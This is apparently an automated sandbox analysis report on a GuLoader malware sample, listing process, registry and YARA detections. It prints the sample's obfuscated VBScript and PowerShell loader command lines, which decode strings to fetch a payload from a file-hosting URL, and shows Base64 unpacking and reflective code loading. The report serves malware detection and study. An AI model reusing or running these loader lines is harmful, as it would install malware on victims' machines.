Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: samlib.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook Jump to behavior
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2536676585.0000000007ACA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2536676585.0000000007A69000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2536676585.0000000007A69000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb? source: powershell.exe, 00000005.00000002.2539882083.00000000089E0000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: \AppData\Local\Temp\Rundturens.txt");IFileSystem3.GetSpecialFolder("2");IFolder.Path();IFileSystem3.DeleteFile("C:\Users\user\AppData\Local\Temp\Rundturens.txt");IFileSystem3.OpenTextFile("C:\Users\user\AppData\Local\Temp\Rundturens.txt", "8", "true");ITextStream.Write("powershell ");ITextStream.Close();IFileSystem3.GetSpecialFolder("2");IFolder.Path();IFileSystem3.DeleteFile("C:\Users\user\AppData\Local\Temp\Rundturens.txt");IFileSystem3.OpenTextFile("C:\Users\user\AppData\Local\Temp\Rundturens.txt", "8", "true");ITextStream.Write("powershell ");ITextStream.Close();IFileSystem3.OpenTextFile("C:\Users\user\AppData\Local\Temp\Rundturens.txt", "8", "true");ITextStream.Write(""");ITextStream.Close();IFileSystem3.GetSpecialFolder("2");IFolder.Path();IFileSystem3.DeleteFile("C:\Users\user\AppData\Local\Temp\Rundturens.txt");IFileSystem3.OpenTextFile("C:\Users\user\AppData\Local\Temp\Rundturens.txt", "8", "true");ITextStream.Write("powershell ");ITextStream.Close();IFileSystem3.OpenTextFile("C:\Users\user\AppData\Local\Temp\Rundturens.txt", "8", "true");ITextStream.Write(""");ITextStream.Close();IFileSystem3.OpenTextFile("C:\Users\user\AppData\Local\Temp\Rundturens.txt", "8", "true");ITextStream.Write("$Superexcrescence = 1;$Necroscopic18='Sub");ITextStream.Close();IFileSystem3.GetSpecialFolder("2");IFolder.Path();IFileSystem3.DeleteFile("C:\Users\user\AppData\Local\Temp\Rundturens.txt");IFileSystem3.OpenTextFile("C:\Users\user\AppData\Local\Temp\Rundturens.txt", "8", "true");ITextStream.Write("powershell ");ITextStream.Close();IFileSystem3.OpenTextFile("C:\Users\user\AppData\Local\Temp\Rundturens.txt", "8", "true");ITextStream.Write(""");ITextStream.Close();IFileSystem3.OpenTextFile("C:\Users\user\AppData\Local\Temp\Rundturens.txt", "8", "true");ITextStream.Write("$Superexcrescence = 1;$Necroscopic18='Sub");ITextStream.Close();IFileSystem3.OpenTextFile("C:\Users\user\AppData\Local\Temp\Rundturens.txt", "8", "true");ITextStream.Write("strin';$Necroscopic18+='g';");ITextStream.Close();IFileSystem3.GetSpecialFolder("2");IFolder.Path();IFileSystem3.DeleteFile("C:\Users\user\AppData\Local\Temp\Rundturens.txt");IFileSystem3.OpenTextFile("C:\Users\user\AppData\Local\Temp\Rundturens.txt", "8", "true");ITextStream.Write("powershell ");ITextStream.Close();IFileSystem3.OpenTextFile("C:\Users\user\AppData\Local\Temp\Rundturens.txt", "8", "true");ITextStream.Write(""");ITextStream.Close();IFileSystem3.OpenTextFile("C:\Users\user\AppData\Local\Temp\Rundturens.txt", "8", "true");ITextStream.Write("$Superexcrescence = 1;$Necroscopic18='Sub");ITextStream.Close();IFileSystem3.OpenTextFile("C:\Users\user\AppData\Local\Temp\Rundturens.txt", "8", "true");ITextStream.Write("strin';$Necroscopic18+='g';");ITextStream.Close();IFileSystem3.OpenTextFile("C:\Users\user\AppData\Local\Temp\Rundturens.txt", "8", "true");ITextStream.Write("Function Refrig213($Kllert){$");ITextStream.Close();IFileSystem3.GetSpecialFolder("2");IFolder.Path();IFi
Yara detected GuLoader
Source: Yara match File source: Process Memory Space: wab.exe PID: 5496, type: MEMORYSTR
Source: Yara match File source: 00000005.00000002.2541730708.000000000AE11000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2541238211.0000000008EE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2532896490.00000000063BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2698898787.000001A0DA98C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Josts)$global:Optegnelsesbogen199 = [System.Text.Encoding]::ASCII.GetString($akvavitter)$global:Provivisection=$Optegnelsesbogen199.substring(325332,30363)<#Statuttens Throughways Wa
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Unstreamlined $Energimrke $Bellware), (Utilfredsstillende @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Formasteligt = [AppDomain]::CurrentDomain.GetAsse
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Masochisten)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Adulthoods, $false).DefineType($Agglutinate,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Josts)$global:Optegnelsesbogen199 = [System.Text.Encoding]::ASCII.GetString($akvavitter)$global:Provivisection=$Optegnelsesbogen199.substring(325332,30363)<#Statuttens Throughways Wa
Suspicious powershell command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6 Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/ .ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213 'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml Kilede:R agummG rundleShackinwImpardogElektroa Superlw ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes ');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.Am
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6 Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/ .ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213 'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml Kilede:R agummG rundleShackinwImpardogElektroa Superlw ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes ');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.Am
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6 Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/ .ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213 'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml Kilede:R agummG rundleShackinwImpardogElektroa Superlw ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes ');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.Am Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6 Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/ .ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213 'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml Kilede:R agummG rundleShackinwImpardogElektroa Superlw ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes ');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.Am Jump to behavior
Binary contains a suspicious time stamp
Source: 31437F.exe.9.dr Static PE information: 0x853858FE [Sun Oct 28 18:42:06 2040 UTC]
PE file contains sections with non-standard names
Source: 31437F.exe.9.dr Static PE information: section name: .didat
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_038459C8 pushad ; iretd 5_2_038459DE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07E10638 push eax; mov dword ptr [esp], ecx 5_2_07E10AC4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07E18187 push FFFFFF8Bh; iretd 5_2_07E18189
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07E1811B push FFFFFF8Bh; iretd 5_2_07E1811D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07E11B73 push dword ptr [ebp+ebx-75h]; iretd 5_2_07E11B79
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07E10AB8 push eax; mov dword ptr [esp], ecx 5_2_07E10AC4
Drops PE files
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\188E93\31437F.exe Jump to dropped file
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
